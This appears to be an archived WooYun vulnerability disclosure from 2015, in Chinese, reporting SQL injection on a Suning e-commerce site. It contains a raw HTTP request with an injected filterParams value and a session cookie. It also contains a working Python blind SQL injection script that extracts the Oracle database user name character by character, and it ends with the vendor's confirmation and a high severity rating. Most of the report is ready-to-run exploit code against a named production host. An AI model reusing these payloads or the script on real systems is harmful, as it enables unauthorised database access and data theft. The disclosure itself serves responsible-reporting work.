乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-20: 细节已通知厂商并且等待厂商处理中 2015-07-20: 厂商已经确认,细节仅向厂商公开 2015-07-30: 细节向核心白帽子及相关领域专家公开 2015-08-09: 细节向普通白帽子公开 2015-08-19: 细节向实习白帽子公开 2015-09-03: 细节向公众公开
sql注射
站点:online.suning.com
POST /console/Service/supplieradmin/pageMonitorGroup HTTP/1.1Host: online.suning.comProxy-Connection: keep-aliveContent-Length: 83Accept: application/json, text/javascript, */*; q=0.01Origin: http://online.suning.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://online.suning.com/console/Service/common/index?url=/supplieradmin/groupMonitorAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2Cookie: JSESSIONID=66B79260AC180DAE0167D2861D886E8D;filterParams=+and+supplierCode+like+'%251%25'&page=1&rows=30&sort=groupId&order=asc
验证脚本
#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport urllibheaders = {'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest', 'Proxy-Connection':'keep-alive', 'Referer': 'http://online.suning.com/console/Service/common/index?url=/supplieradmin/groupMonitor', 'Cookie': 'JSESSIONID=66B79260AC180DAE0167D2861D886E8D', 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36'}payloads = list(string.ascii_uppercase)#payloads = list('T')print 'start to retrive Oracle user:'user = ''for i in range(1,7): for payload in payloads: conn = httplib.HTTPConnection('online.suning.com', timeout=60) params = { 'filterParams': " and supplierCode like '%1%'and ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s" % (i, ord(payload)), 'page': '1', 'rows': '20', 'sort': 'createTimeDay', 'order': 'asc', 'customerId':'', } #print urllib.urlencode(params) conn.request(method='POST', url='/console/Service/supplieradmin/pageMonitorGroup', body = urllib.urlencode(params), headers = headers) resp = conn.getresponse() html_doc = resp.read().decode('utf-8') conn.close() #print html_doc print '.', if html_doc.find(u'groupName') > 0: # True user += payload print '\n[in progress]', user breakprint '\nOracle user is', user
危害等级:高
漏洞Rank:10
确认时间:2015-07-20 10:29
感谢提交。
暂无